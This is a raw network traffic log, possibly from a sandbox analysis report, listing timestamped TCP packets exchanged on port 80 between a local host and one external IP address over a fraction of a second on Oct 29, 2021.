Oct 29, 2021 20:50:55.511946917 CEST	80	49866	45.141.84.21	192.168.2.4
Oct 29, 2021 20:50:55.511965036 CEST	80	49866	45.141.84.21	192.168.2.4
Oct 29, 2021 20:50:55.511974096 CEST	49866	80	192.168.2.4	45.141.84.21
Oct 29, 2021 20:50:55.511976004 CEST	80	49866	45.141.84.21	192.168.2.4
Oct 29, 2021 20:50:55.511992931 CEST	80	49866	45.141.84.21	192.168.2.4
Oct 29, 2021 20:50:55.511996031 CEST	49866	80	192.168.2.4	45.141.84.21
Oct 29, 2021 20:50:55.512010098 CEST	80	49866	45.141.84.21	192.168.2.4
Oct 29, 2021 20:50:55.512027025 CEST	80	49866	45.141.84.21	192.168.2.4
Oct 29, 2021 20:50:55.512042999 CEST	80	49866	45.141.84.21	192.168.2.4
Oct 29, 2021 20:50:55.512046099 CEST	49866	80	192.168.2.4	45.141.84.21
Oct 29, 2021 20:50:55.512063980 CEST	80	49866	45.141.84.21	192.168.2.4
Oct 29, 2021 20:50:55.512084961 CEST	49866	80	192.168.2.4	45.141.84.21
Oct 29, 2021 20:50:55.512089014 CEST	80	49866	45.141.84.21	192.168.2.4
Oct 29, 2021 20:50:55.512099981 CEST	49866	80	192.168.2.4	45.141.84.21
Oct 29, 2021 20:50:55.512100935 CEST	80	49866	45.141.84.21	192.168.2.4
Oct 29, 2021 20:50:55.512118101 CEST	80	49866	45.141.84.21	192.168.2.4
Oct 29, 2021 20:50:55.512134075 CEST	80	49866	45.141.84.21	192.168.2.4
Oct 29, 2021 20:50:55.512144089 CEST	49866	80	192.168.2.4	45.141.84.21
Oct 29, 2021 20:50:55.512176991 CEST	49866	80	192.168.2.4	45.141.84.21
Oct 29, 2021 20:50:55.512183905 CEST	80	49866	45.141.84.21	192.168.2.4
Oct 29, 2021 20:50:55.512197971 CEST	80	49866	45.141.84.21	192.168.2.4
Oct 29, 2021 20:50:55.512212038 CEST	80	49866	45.141.84.21	192.168.2.4
Oct 29, 2021 20:50:55.512228012 CEST	80	49866	45.141.84.21	192.168.2.4
Oct 29, 2021 20:50:55.512237072 CEST	49866	80	192.168.2.4	45.141.84.21
Oct 29, 2021 20:50:55.512244940 CEST	80	49866	45.141.84.21	192.168.2.4
Oct 29, 2021 20:50:55.512257099 CEST	80	49866	45.141.84.21	192.168.2.4
Oct 29, 2021 20:50:55.512269974 CEST	49866	80	192.168.2.4	45.141.84.21
Oct 29, 2021 20:50:55.512273073 CEST	80	49866	45.141.84.21	192.168.2.4
Oct 29, 2021 20:50:55.512290955 CEST	80	49866	45.141.84.21	192.168.2.4
Oct 29, 2021 20:50:55.512299061 CEST	49866	80	192.168.2.4	45.141.84.21
Oct 29, 2021 20:50:55.512307882 CEST	80	49866	45.141.84.21	192.168.2.4
Oct 29, 2021 20:50:55.512325048 CEST	80	49866	45.141.84.21	192.168.2.4
Oct 29, 2021 20:50:55.512331963 CEST	49866	80	192.168.2.4	45.141.84.21
Oct 29, 2021 20:50:55.512341022 CEST	80	49866	45.141.84.21	192.168.2.4
Oct 29, 2021 20:50:55.512356997 CEST	80	49866	45.141.84.21	192.168.2.4
Oct 29, 2021 20:50:55.512381077 CEST	49866	80	192.168.2.4	45.141.84.21
Oct 29, 2021 20:50:55.512386084 CEST	80	49866	45.141.84.21	192.168.2.4
Oct 29, 2021 20:50:55.512399912 CEST	49866	80	192.168.2.4	45.141.84.21
Oct 29, 2021 20:50:55.560071945 CEST	80	49866	45.141.84.21	192.168.2.4
Oct 29, 2021 20:50:55.560102940 CEST	80	49866	45.141.84.21	192.168.2.4
Oct 29, 2021 20:50:55.560116053 CEST	80	49866	45.141.84.21	192.168.2.4
Oct 29, 2021 20:50:55.560133934 CEST	80	49866	45.141.84.21	192.168.2.4
Oct 29, 2021 20:50:55.560169935 CEST	80	49866	45.141.84.21	192.168.2.4
Oct 29, 2021 20:50:55.560185909 CEST	80	49866	45.141.84.21	192.168.2.4
Oct 29, 2021 20:50:55.560199022 CEST	80	49866	45.141.84.21	192.168.2.4
Oct 29, 2021 20:50:55.560215950 CEST	80	49866	45.141.84.21	192.168.2.4
Oct 29, 2021 20:50:55.560231924 CEST	80	49866	45.141.84.21	192.168.2.4
Oct 29, 2021 20:50:55.560249090 CEST	80	49866	45.141.84.21	192.168.2.4
Oct 29, 2021 20:50:55.560266018 CEST	80	49866	45.141.84.21	192.168.2.4
Oct 29, 2021 20:50:55.560262918 CEST	49866	80	192.168.2.4	45.141.84.21
Oct 29, 2021 20:50:55.560282946 CEST	80	49866	45.141.84.21	192.168.2.4
Oct 29, 2021 20:50:55.560298920 CEST	80	49866	45.141.84.21	192.168.2.4
Oct 29, 2021 20:50:55.560311079 CEST	80	49866	45.141.84.21	192.168.2.4
Oct 29, 2021 20:50:55.560332060 CEST	49866	80	192.168.2.4	45.141.84.21
Oct 29, 2021 20:50:55.560384035 CEST	49866	80	192.168.2.4	45.141.84.21
Oct 29, 2021 20:50:55.560436010 CEST	49866	80	192.168.2.4	45.141.84.21
Oct 29, 2021 20:50:55.560462952 CEST	80	49866	45.141.84.21	192.168.2.4
Oct 29, 2021 20:50:55.560481071 CEST	80	49866	45.141.84.21	192.168.2.4
Oct 29, 2021 20:50:55.560497046 CEST	80	49866	45.141.84.21	192.168.2.4
Oct 29, 2021 20:50:55.560513973 CEST	80	49866	45.141.84.21	192.168.2.4
Oct 29, 2021 20:50:55.560528994 CEST	80	49866	45.141.84.21	192.168.2.4
Oct 29, 2021 20:50:55.560535908 CEST	49866	80	192.168.2.4	45.141.84.21
Oct 29, 2021 20:50:55.560545921 CEST	80	49866	45.141.84.21	192.168.2.4
Oct 29, 2021 20:50:55.560559034 CEST	80	49866	45.141.84.21	192.168.2.4
Oct 29, 2021 20:50:55.560574055 CEST	80	49866	45.141.84.21	192.168.2.4
Oct 29, 2021 20:50:55.560580969 CEST	49866	80	192.168.2.4	45.141.84.21
Oct 29, 2021 20:50:55.560590982 CEST	80	49866	45.141.84.21	192.168.2.4
Oct 29, 2021 20:50:55.560610056 CEST	49866	80	192.168.2.4	45.141.84.21
Oct 29, 2021 20:50:55.560637951 CEST	49866	80	192.168.2.4	45.141.84.21
Oct 29, 2021 20:50:55.560770035 CEST	80	49866	45.141.84.21	192.168.2.4
Oct 29, 2021 20:50:55.560791016 CEST	80	49866	45.141.84.21	192.168.2.4
Oct 29, 2021 20:50:55.560831070 CEST	49866	80	192.168.2.4	45.141.84.21
Oct 29, 2021 20:50:55.560877085 CEST	49866	80	192.168.2.4	45.141.84.21
Oct 29, 2021 20:50:55.560914993 CEST	80	49866	45.141.84.21	192.168.2.4
Oct 29, 2021 20:50:55.560935020 CEST	80	49866	45.141.84.21	192.168.2.4
Oct 29, 2021 20:50:55.560950994 CEST	80	49866	45.141.84.21	192.168.2.4
Oct 29, 2021 20:50:55.560967922 CEST	80	49866	45.141.84.21	192.168.2.4
Oct 29, 2021 20:50:55.561024904 CEST	49866	80	192.168.2.4	45.141.84.21
Oct 29, 2021 20:50:55.561027050 CEST	80	49866	45.141.84.21	192.168.2.4
Oct 29, 2021 20:50:55.561045885 CEST	80	49866	45.141.84.21	192.168.2.4
Oct 29, 2021 20:50:55.561058998 CEST	80	49866	45.141.84.21	192.168.2.4
Oct 29, 2021 20:50:55.561105967 CEST	49866	80	192.168.2.4	45.141.84.21
Oct 29, 2021 20:50:55.561151028 CEST	80	49866	45.141.84.21	192.168.2.4
Oct 29, 2021 20:50:55.561170101 CEST	80	49866	45.141.84.21	192.168.2.4
Oct 29, 2021 20:50:55.561187983 CEST	80	49866	45.141.84.21	192.168.2.4
Oct 29, 2021 20:50:55.561202049 CEST	49866	80	192.168.2.4	45.141.84.21
Oct 29, 2021 20:50:55.561245918 CEST	49866	80	192.168.2.4	45.141.84.21
Oct 29, 2021 20:50:55.561268091 CEST	80	49866	45.141.84.21	192.168.2.4
Oct 29, 2021 20:50:55.561450005 CEST	80	49866	45.141.84.21	192.168.2.4
Oct 29, 2021 20:50:55.561461926 CEST	49866	80	192.168.2.4	45.141.84.21
Oct 29, 2021 20:50:55.561470032 CEST	80	49866	45.141.84.21	192.168.2.4
Oct 29, 2021 20:50:55.561486959 CEST	80	49866	45.141.84.21	192.168.2.4
Oct 29, 2021 20:50:55.561496973 CEST	49866	80	192.168.2.4	45.141.84.21
Oct 29, 2021 20:50:55.561499119 CEST	80	49866	45.141.84.21	192.168.2.4
Oct 29, 2021 20:50:55.561516047 CEST	80	49866	45.141.84.21	192.168.2.4
Oct 29, 2021 20:50:55.561527014 CEST	49866	80	192.168.2.4	45.141.84.21
Oct 29, 2021 20:50:55.561532974 CEST	80	49866	45.141.84.21	192.168.2.4
Oct 29, 2021 20:50:55.561548948 CEST	80	49866	45.141.84.21	192.168.2.4
Oct 29, 2021 20:50:55.561559916 CEST	80	49866	45.141.84.21	192.168.2.4
Oct 29, 2021 20:50:55.561572075 CEST	49866	80	192.168.2.4	45.141.84.21
Oct 29, 2021 20:50:55.561606884 CEST	49866	80	192.168.2.4	45.141.84.21
Oct 29, 2021 20:50:55.561676979 CEST	49866	80	192.168.2.4	45.141.84.21
Oct 29, 2021 20:50:55.561697006 CEST	80	49866	45.141.84.21	192.168.2.4
Oct 29, 2021 20:50:55.561714888 CEST	80	49866	45.141.84.21	192.168.2.4
Oct 29, 2021 20:50:55.561743021 CEST	49866	80	192.168.2.4	45.141.84.21
Oct 29, 2021 20:50:55.561790943 CEST	80	49866	45.141.84.21	192.168.2.4
Oct 29, 2021 20:50:55.561836958 CEST	49866	80	192.168.2.4	45.141.84.21
Oct 29, 2021 20:50:55.561917067 CEST	49866	80	192.168.2.4	45.141.84.21
Oct 29, 2021 20:50:55.561989069 CEST	49866	80	192.168.2.4	45.141.84.21
Oct 29, 2021 20:50:55.562014103 CEST	80	49866	45.141.84.21	192.168.2.4
Oct 29, 2021 20:50:55.609826088 CEST	80	49866	45.141.84.21	192.168.2.4
Oct 29, 2021 20:50:55.609863997 CEST	80	49866	45.141.84.21	192.168.2.4
Oct 29, 2021 20:50:55.609889030 CEST	80	49866	45.141.84.21	192.168.2.4
Oct 29, 2021 20:50:55.609905958 CEST	80	49866	45.141.84.21	192.168.2.4
Oct 29, 2021 20:50:55.609930038 CEST	80	49866	45.141.84.21	192.168.2.4
Oct 29, 2021 20:50:55.609954119 CEST	80	49866	45.141.84.21	192.168.2.4
Oct 29, 2021 20:50:55.609965086 CEST	49866	80	192.168.2.4	45.141.84.21
Oct 29, 2021 20:50:55.609976053 CEST	80	49866	45.141.84.21	192.168.2.4
Oct 29, 2021 20:50:55.609992027 CEST	80	49866	45.141.84.21	192.168.2.4
Oct 29, 2021 20:50:55.610033989 CEST	49866	80	192.168.2.4	45.141.84.21
Oct 29, 2021 20:50:55.610066891 CEST	80	49866	45.141.84.21	192.168.2.4
Oct 29, 2021 20:50:55.610093117 CEST	80	49866	45.141.84.21	192.168.2.4
Oct 29, 2021 20:50:55.610101938 CEST	49866	80	192.168.2.4	45.141.84.21
Oct 29, 2021 20:50:55.610117912 CEST	80	49866	45.141.84.21	192.168.2.4
Oct 29, 2021 20:50:55.610142946 CEST	80	49866	45.141.84.21	192.168.2.4
Oct 29, 2021 20:50:55.610166073 CEST	80	49866	45.141.84.21	192.168.2.4
Oct 29, 2021 20:50:55.610169888 CEST	49866	80	192.168.2.4	45.141.84.21
Oct 29, 2021 20:50:55.610188961 CEST	80	49866	45.141.84.21	192.168.2.4
Oct 29, 2021 20:50:55.610194921 CEST	49866	80	192.168.2.4	45.141.84.21
Oct 29, 2021 20:50:55.610208035 CEST	80	49866	45.141.84.21	192.168.2.4
Oct 29, 2021 20:50:55.610227108 CEST	49866	80	192.168.2.4	45.141.84.21
Oct 29, 2021 20:50:55.610233068 CEST	80	49866	45.141.84.21	192.168.2.4
Oct 29, 2021 20:50:55.610256910 CEST	80	49866	45.141.84.21	192.168.2.4
Oct 29, 2021 20:50:55.610280037 CEST	49866	80	192.168.2.4	45.141.84.21
Oct 29, 2021 20:50:55.610280037 CEST	80	49866	45.141.84.21	192.168.2.4
Oct 29, 2021 20:50:55.610296011 CEST	80	49866	45.141.84.21	192.168.2.4
Oct 29, 2021 20:50:55.610335112 CEST	49866	80	192.168.2.4	45.141.84.21
Oct 29, 2021 20:50:55.610363007 CEST	80	49866	45.141.84.21	192.168.2.4
Oct 29, 2021 20:50:55.610388041 CEST	80	49866	45.141.84.21	192.168.2.4
Oct 29, 2021 20:50:55.610413074 CEST	80	49866	45.141.84.21	192.168.2.4
Oct 29, 2021 20:50:55.610429049 CEST	80	49866	45.141.84.21	192.168.2.4
Oct 29, 2021 20:50:55.610436916 CEST	49866	80	192.168.2.4	45.141.84.21
Oct 29, 2021 20:50:55.610451937 CEST	80	49866	45.141.84.21	192.168.2.4
Oct 29, 2021 20:50:55.610475063 CEST	49866	80	192.168.2.4	45.141.84.21
Oct 29, 2021 20:50:55.610476017 CEST	80	49866	45.141.84.21	192.168.2.4
Oct 29, 2021 20:50:55.610502005 CEST	80	49866	45.141.84.21	192.168.2.4
Oct 29, 2021 20:50:55.610517025 CEST	49866	80	192.168.2.4	45.141.84.21
Oct 29, 2021 20:50:55.610518932 CEST	80	49866	45.141.84.21	192.168.2.4
Oct 29, 2021 20:50:55.610577106 CEST	49866	80	192.168.2.4	45.141.84.21
Oct 29, 2021 20:50:55.610650063 CEST	80	49866	45.141.84.21	192.168.2.4
Oct 29, 2021 20:50:55.610676050 CEST	80	49866	45.141.84.21	192.168.2.4
Oct 29, 2021 20:50:55.610701084 CEST	80	49866	45.141.84.21	192.168.2.4
Oct 29, 2021 20:50:55.610721111 CEST	49866	80	192.168.2.4	45.141.84.21
Oct 29, 2021 20:50:55.610754967 CEST	80	49866	45.141.84.21	192.168.2.4
Oct 29, 2021 20:50:55.610780954 CEST	80	49866	45.141.84.21	192.168.2.4
Oct 29, 2021 20:50:55.610805035 CEST	80	49866	45.141.84.21	192.168.2.4
Oct 29, 2021 20:50:55.610814095 CEST	49866	80	192.168.2.4	45.141.84.21
Oct 29, 2021 20:50:55.610822916 CEST	80	49866	45.141.84.21	192.168.2.4
Oct 29, 2021 20:50:55.610862017 CEST	49866	80	192.168.2.4	45.141.84.21
Oct 29, 2021 20:50:55.611330986 CEST	80	49866	45.141.84.21	192.168.2.4
Oct 29, 2021 20:50:55.611362934 CEST	80	49866	45.141.84.21	192.168.2.4
Oct 29, 2021 20:50:55.611387014 CEST	80	49866	45.141.84.21	192.168.2.4
Oct 29, 2021 20:50:55.611402035 CEST	49866	80	192.168.2.4	45.141.84.21
Oct 29, 2021 20:50:55.611412048 CEST	80	49866	45.141.84.21	192.168.2.4
Oct 29, 2021 20:50:55.611434937 CEST	49866	80	192.168.2.4	45.141.84.21
Oct 29, 2021 20:50:55.611437082 CEST	80	49866	45.141.84.21	192.168.2.4
Oct 29, 2021 20:50:55.611462116 CEST	80	49866	45.141.84.21	192.168.2.4
Oct 29, 2021 20:50:55.611478090 CEST	80	49866	45.141.84.21	192.168.2.4
Oct 29, 2021 20:50:55.611481905 CEST	49866	80	192.168.2.4	45.141.84.21
Oct 29, 2021 20:50:55.611501932 CEST	80	49866	45.141.84.21	192.168.2.4
Oct 29, 2021 20:50:55.611524105 CEST	80	49866	45.141.84.21	192.168.2.4
Oct 29, 2021 20:50:55.611546040 CEST	49866	80	192.168.2.4	45.141.84.21
Oct 29, 2021 20:50:55.611574888 CEST	80	49866	45.141.84.21	192.168.2.4
Oct 29, 2021 20:50:55.611582994 CEST	49866	80	192.168.2.4	45.141.84.21
Oct 29, 2021 20:50:55.611591101 CEST	80	49866	45.141.84.21	192.168.2.4
Oct 29, 2021 20:50:55.611614943 CEST	80	49866	45.141.84.21	192.168.2.4
Oct 29, 2021 20:50:55.611637115 CEST	80	49866	45.141.84.21	192.168.2.4
Oct 29, 2021 20:50:55.611638069 CEST	49866	80	192.168.2.4	45.141.84.21
Oct 29, 2021 20:50:55.611659050 CEST	80	49866	45.141.84.21	192.168.2.4
Oct 29, 2021 20:50:55.611681938 CEST	49866	80	192.168.2.4	45.141.84.21
Oct 29, 2021 20:50:55.611782074 CEST	80	49866	45.141.84.21	192.168.2.4
Oct 29, 2021 20:50:55.611825943 CEST	49866	80	192.168.2.4	45.141.84.21
Oct 29, 2021 20:50:55.612241030 CEST	80	49866	45.141.84.21	192.168.2.4
Oct 29, 2021 20:50:55.612274885 CEST	80	49866	45.141.84.21	192.168.2.4
Oct 29, 2021 20:50:55.612298012 CEST	80	49866	45.141.84.21	192.168.2.4
Oct 29, 2021 20:50:55.612314939 CEST	80	49866	45.141.84.21	192.168.2.4
Oct 29, 2021 20:50:55.612355947 CEST	49866	80	192.168.2.4	45.141.84.21
Oct 29, 2021 20:50:55.612385988 CEST	49866	80	192.168.2.4	45.141.84.21
Oct 29, 2021 20:50:55.659936905 CEST	80	49866	45.141.84.21	192.168.2.4
Oct 29, 2021 20:50:55.659974098 CEST	80	49866	45.141.84.21	192.168.2.4
Oct 29, 2021 20:50:55.659997940 CEST	80	49866	45.141.84.21	192.168.2.4
Oct 29, 2021 20:50:55.660015106 CEST	80	49866	45.141.84.21	192.168.2.4
Oct 29, 2021 20:50:55.660099030 CEST	80	49866	45.141.84.21	192.168.2.4
Oct 29, 2021 20:50:55.660116911 CEST	49866	80	192.168.2.4	45.141.84.21
Oct 29, 2021 20:50:55.660125017 CEST	80	49866	45.141.84.21	192.168.2.4
Oct 29, 2021 20:50:55.660151005 CEST	80	49866	45.141.84.21	192.168.2.4
Oct 29, 2021 20:50:55.660176039 CEST	80	49866	45.141.84.21	192.168.2.4
Oct 29, 2021 20:50:55.660188913 CEST	49866	80	192.168.2.4	45.141.84.21
Oct 29, 2021 20:50:55.660201073 CEST	80	49866	45.141.84.21	192.168.2.4
Oct 29, 2021 20:50:55.660221100 CEST	49866	80	192.168.2.4	45.141.84.21
Oct 29, 2021 20:50:55.660224915 CEST	80	49866	45.141.84.21	192.168.2.4
Oct 29, 2021 20:50:55.660240889 CEST	80	49866	45.141.84.21	192.168.2.4
Oct 29, 2021 20:50:55.660274982 CEST	49866	80	192.168.2.4	45.141.84.21
Oct 29, 2021 20:50:55.660288095 CEST	80	49866	45.141.84.21	192.168.2.4
Oct 29, 2021 20:50:55.660312891 CEST	80	49866	45.141.84.21	192.168.2.4
Oct 29, 2021 20:50:55.660329103 CEST	49866	80	192.168.2.4	45.141.84.21
Oct 29, 2021 20:50:55.660353899 CEST	80	49866	45.141.84.21	192.168.2.4
Oct 29, 2021 20:50:55.660371065 CEST	80	49866	45.141.84.21	192.168.2.4
Oct 29, 2021 20:50:55.660396099 CEST	49866	80	192.168.2.4	45.141.84.21
Oct 29, 2021 20:50:55.660599947 CEST	80	49866	45.141.84.21	192.168.2.4
Oct 29, 2021 20:50:55.660654068 CEST	49866	80	192.168.2.4	45.141.84.21
Oct 29, 2021 20:50:55.660723925 CEST	80	49866	45.141.84.21	192.168.2.4
Oct 29, 2021 20:50:55.660762072 CEST	80	49866	45.141.84.21	192.168.2.4
Oct 29, 2021 20:50:55.660784960 CEST	80	49866	45.141.84.21	192.168.2.4
Oct 29, 2021 20:50:55.660805941 CEST	80	49866	45.141.84.21	192.168.2.4
Oct 29, 2021 20:50:55.660818100 CEST	49866	80	192.168.2.4	45.141.84.21
Oct 29, 2021 20:50:55.660829067 CEST	80	49866	45.141.84.21	192.168.2.4
Oct 29, 2021 20:50:55.660860062 CEST	80	49866	45.141.84.21	192.168.2.4
Oct 29, 2021 20:50:55.660885096 CEST	80	49866	45.141.84.21	192.168.2.4
Oct 29, 2021 20:50:55.660896063 CEST	49866	80	192.168.2.4	45.141.84.21
Oct 29, 2021 20:50:55.660907030 CEST	80	49866	45.141.84.21	192.168.2.4
Oct 29, 2021 20:50:55.660929918 CEST	80	49866	45.141.84.21	192.168.2.4
Oct 29, 2021 20:50:55.660947084 CEST	80	49866	45.141.84.21	192.168.2.4
Oct 29, 2021 20:50:55.660947084 CEST	49866	80	192.168.2.4	45.141.84.21
Oct 29, 2021 20:50:55.660974026 CEST	49866	80	192.168.2.4	45.141.84.21
Oct 29, 2021 20:50:55.661005020 CEST	49866	80	192.168.2.4	45.141.84.21
Oct 29, 2021 20:50:55.661077976 CEST	80	49866	45.141.84.21	192.168.2.4
Oct 29, 2021 20:50:55.661119938 CEST	80	49866	45.141.84.21	192.168.2.4
Oct 29, 2021 20:50:55.661144972 CEST	80	49866	45.141.84.21	192.168.2.4
Oct 29, 2021 20:50:55.661192894 CEST	80	49866	45.141.84.21	192.168.2.4
Oct 29, 2021 20:50:55.661206007 CEST	49866	80	192.168.2.4	45.141.84.21
Oct 29, 2021 20:50:55.661218882 CEST	80	49866	45.141.84.21	192.168.2.4
Oct 29, 2021 20:50:55.661241055 CEST	49866	80	192.168.2.4	45.141.84.21
Oct 29, 2021 20:50:55.661242962 CEST	80	49866	45.141.84.21	192.168.2.4
Oct 29, 2021 20:50:55.661259890 CEST	80	49866	45.141.84.21	192.168.2.4
Oct 29, 2021 20:50:55.661294937 CEST	49866	80	192.168.2.4	45.141.84.21
Oct 29, 2021 20:50:55.661340952 CEST	80	49866	45.141.84.21	192.168.2.4
Oct 29, 2021 20:50:55.661365032 CEST	80	49866	45.141.84.21	192.168.2.4
Oct 29, 2021 20:50:55.661389112 CEST	80	49866	45.141.84.21	192.168.2.4
Oct 29, 2021 20:50:55.661390066 CEST	49866	80	192.168.2.4	45.141.84.21
Oct 29, 2021 20:50:55.661405087 CEST	80	49866	45.141.84.21	192.168.2.4
Oct 29, 2021 20:50:55.661432028 CEST	49866	80	192.168.2.4	45.141.84.21
Oct 29, 2021 20:50:55.661634922 CEST	80	49866	45.141.84.21	192.168.2.4
Oct 29, 2021 20:50:55.661659956 CEST	80	49866	45.141.84.21	192.168.2.4
Oct 29, 2021 20:50:55.661689043 CEST	49866	80	192.168.2.4	45.141.84.21
Oct 29, 2021 20:50:55.661699057 CEST	80	49866	45.141.84.21	192.168.2.4
Oct 29, 2021 20:50:55.661724091 CEST	80	49866	45.141.84.21	192.168.2.4
Oct 29, 2021 20:50:55.661737919 CEST	49866	80	192.168.2.4	45.141.84.21
Oct 29, 2021 20:50:55.661747932 CEST	80	49866	45.141.84.21	192.168.2.4
Oct 29, 2021 20:50:55.661771059 CEST	80	49866	45.141.84.21	192.168.2.4
Oct 29, 2021 20:50:55.661792040 CEST	49866	80	192.168.2.4	45.141.84.21
Oct 29, 2021 20:50:55.661804914 CEST	80	49866	45.141.84.21	192.168.2.4
Oct 29, 2021 20:50:55.661828041 CEST	80	49866	45.141.84.21	192.168.2.4
Oct 29, 2021 20:50:55.661851883 CEST	80	49866	45.141.84.21	192.168.2.4
Oct 29, 2021 20:50:55.661853075 CEST	49866	80	192.168.2.4	45.141.84.21
Oct 29, 2021 20:50:55.661879063 CEST	80	49866	45.141.84.21	192.168.2.4
Oct 29, 2021 20:50:55.661892891 CEST	49866	80	192.168.2.4	45.141.84.21
Oct 29, 2021 20:50:55.661895037 CEST	80	49866	45.141.84.21	192.168.2.4
Oct 29, 2021 20:50:55.661941051 CEST	49866	80	192.168.2.4	45.141.84.21
Oct 29, 2021 20:50:55.662261009 CEST	80	49866	45.141.84.21	192.168.2.4
Oct 29, 2021 20:50:55.662283897 CEST	80	49866	45.141.84.21	192.168.2.4
Oct 29, 2021 20:50:55.662306070 CEST	80	49866	45.141.84.21	192.168.2.4
Oct 29, 2021 20:50:55.662329912 CEST	80	49866	45.141.84.21	192.168.2.4
Oct 29, 2021 20:50:55.662349939 CEST	49866	80	192.168.2.4	45.141.84.21
Oct 29, 2021 20:50:55.662353039 CEST	80	49866	45.141.84.21	192.168.2.4
Oct 29, 2021 20:50:55.662379980 CEST	49866	80	192.168.2.4	45.141.84.21
Oct 29, 2021 20:50:55.662383080 CEST	80	49866	45.141.84.21	192.168.2.4
Oct 29, 2021 20:50:55.662399054 CEST	80	49866	45.141.84.21	192.168.2.4
Oct 29, 2021 20:50:55.662427902 CEST	49866	80	192.168.2.4	45.141.84.21
Oct 29, 2021 20:50:55.709980965 CEST	80	49866	45.141.84.21	192.168.2.4
Oct 29, 2021 20:50:55.710050106 CEST	80	49866	45.141.84.21	192.168.2.4
Oct 29, 2021 20:50:55.710072041 CEST	80	49866	45.141.84.21	192.168.2.4
Oct 29, 2021 20:50:55.710091114 CEST	80	49866	45.141.84.21	192.168.2.4
Oct 29, 2021 20:50:55.710112095 CEST	80	49866	45.141.84.21	192.168.2.4
Oct 29, 2021 20:50:55.710134029 CEST	80	49866	45.141.84.21	192.168.2.4
Oct 29, 2021 20:50:55.710144043 CEST	49866	80	192.168.2.4	45.141.84.21
Oct 29, 2021 20:50:55.710149050 CEST	80	49866	45.141.84.21	192.168.2.4
Oct 29, 2021 20:50:55.710197926 CEST	49866	80	192.168.2.4	45.141.84.21
Oct 29, 2021 20:50:55.710231066 CEST	80	49866	45.141.84.21	192.168.2.4
Oct 29, 2021 20:50:55.710253000 CEST	80	49866	45.141.84.21	192.168.2.4
Oct 29, 2021 20:50:55.710261106 CEST	49866	80	192.168.2.4	45.141.84.21
Oct 29, 2021 20:50:55.710275888 CEST	80	49866	45.141.84.21	192.168.2.4
Oct 29, 2021 20:50:55.710293055 CEST	80	49866	45.141.84.21	192.168.2.4
Oct 29, 2021 20:50:55.710300922 CEST	49866	80	192.168.2.4	45.141.84.21
Oct 29, 2021 20:50:55.710340023 CEST	49866	80	192.168.2.4	45.141.84.21
Oct 29, 2021 20:50:55.710356951 CEST	80	49866	45.141.84.21	192.168.2.4
Oct 29, 2021 20:50:55.710380077 CEST	80	49866	45.141.84.21	192.168.2.4
Oct 29, 2021 20:50:55.710401058 CEST	80	49866	45.141.84.21	192.168.2.4
Oct 29, 2021 20:50:55.710416079 CEST	80	49866	45.141.84.21	192.168.2.4
Oct 29, 2021 20:50:55.710436106 CEST	49866	80	192.168.2.4	45.141.84.21
Oct 29, 2021 20:50:55.710462093 CEST	49866	80	192.168.2.4	45.141.84.21
Oct 29, 2021 20:50:55.710537910 CEST	80	49866	45.141.84.21	192.168.2.4
Oct 29, 2021 20:50:55.710642099 CEST	80	49866	45.141.84.21	192.168.2.4
Oct 29, 2021 20:50:55.710669041 CEST	80	49866	45.141.84.21	192.168.2.4
Oct 29, 2021 20:50:55.710685015 CEST	80	49866	45.141.84.21	192.168.2.4
Oct 29, 2021 20:50:55.710695982 CEST	49866	80	192.168.2.4	45.141.84.21
Oct 29, 2021 20:50:55.710705996 CEST	80	49866	45.141.84.21	192.168.2.4
Oct 29, 2021 20:50:55.710726976 CEST	80	49866	45.141.84.21	192.168.2.4
Oct 29, 2021 20:50:55.710731030 CEST	49866	80	192.168.2.4	45.141.84.21
Oct 29, 2021 20:50:55.710747004 CEST	80	49866	45.141.84.21	192.168.2.4
Oct 29, 2021 20:50:55.710761070 CEST	80	49866	45.141.84.21	192.168.2.4
Oct 29, 2021 20:50:55.710772991 CEST	49866	80	192.168.2.4	45.141.84.21
Oct 29, 2021 20:50:55.710798979 CEST	49866	80	192.168.2.4	45.141.84.21
Oct 29, 2021 20:50:55.710920095 CEST	80	49866	45.141.84.21	192.168.2.4
Oct 29, 2021 20:50:55.710947990 CEST	80	49866	45.141.84.21	192.168.2.4
Oct 29, 2021 20:50:55.710969925 CEST	80	49866	45.141.84.21	192.168.2.4
Oct 29, 2021 20:50:55.710995913 CEST	80	49866	45.141.84.21	192.168.2.4
Oct 29, 2021 20:50:55.711009979 CEST	49866	80	192.168.2.4	45.141.84.21
Oct 29, 2021 20:50:55.711046934 CEST	49866	80	192.168.2.4	45.141.84.21
Oct 29, 2021 20:50:55.711148024 CEST	80	49866	45.141.84.21	192.168.2.4
Oct 29, 2021 20:50:55.711174011 CEST	80	49866	45.141.84.21	192.168.2.4
Oct 29, 2021 20:50:55.711194992 CEST	80	49866	45.141.84.21	192.168.2.4
Oct 29, 2021 20:50:55.711210012 CEST	80	49866	45.141.84.21	192.168.2.4
Oct 29, 2021 20:50:55.711219072 CEST	49866	80	192.168.2.4	45.141.84.21
Oct 29, 2021 20:50:55.711256981 CEST	49866	80	192.168.2.4	45.141.84.21
Oct 29, 2021 20:50:55.711431980 CEST	80	49866	45.141.84.21	192.168.2.4
Oct 29, 2021 20:50:55.711579084 CEST	80	49866	45.141.84.21	192.168.2.4
Oct 29, 2021 20:50:55.711604118 CEST	80	49866	45.141.84.21	192.168.2.4
Oct 29, 2021 20:50:55.711620092 CEST	80	49866	45.141.84.21	192.168.2.4
Oct 29, 2021 20:50:55.711637020 CEST	80	49866	45.141.84.21	192.168.2.4
Oct 29, 2021 20:50:55.711648941 CEST	49866	80	192.168.2.4	45.141.84.21
Oct 29, 2021 20:50:55.711656094 CEST	80	49866	45.141.84.21	192.168.2.4
Oct 29, 2021 20:50:55.711678982 CEST	80	49866	45.141.84.21	192.168.2.4
Oct 29, 2021 20:50:55.711682081 CEST	49866	80	192.168.2.4	45.141.84.21
Oct 29, 2021 20:50:55.711693048 CEST	80	49866	45.141.84.21	192.168.2.4
Oct 29, 2021 20:50:55.711739063 CEST	49866	80	192.168.2.4	45.141.84.21
Oct 29, 2021 20:50:55.711857080 CEST	80	49866	45.141.84.21	192.168.2.4
Oct 29, 2021 20:50:55.711883068 CEST	80	49866	45.141.84.21	192.168.2.4
Oct 29, 2021 20:50:55.711904049 CEST	80	49866	45.141.84.21	192.168.2.4
Oct 29, 2021 20:50:55.711925030 CEST	80	49866	45.141.84.21	192.168.2.4
Oct 29, 2021 20:50:55.711949110 CEST	80	49866	45.141.84.21	192.168.2.4
Oct 29, 2021 20:50:55.711972952 CEST	49866	80	192.168.2.4	45.141.84.21
Oct 29, 2021 20:50:55.712012053 CEST	49866	80	192.168.2.4	45.141.84.21
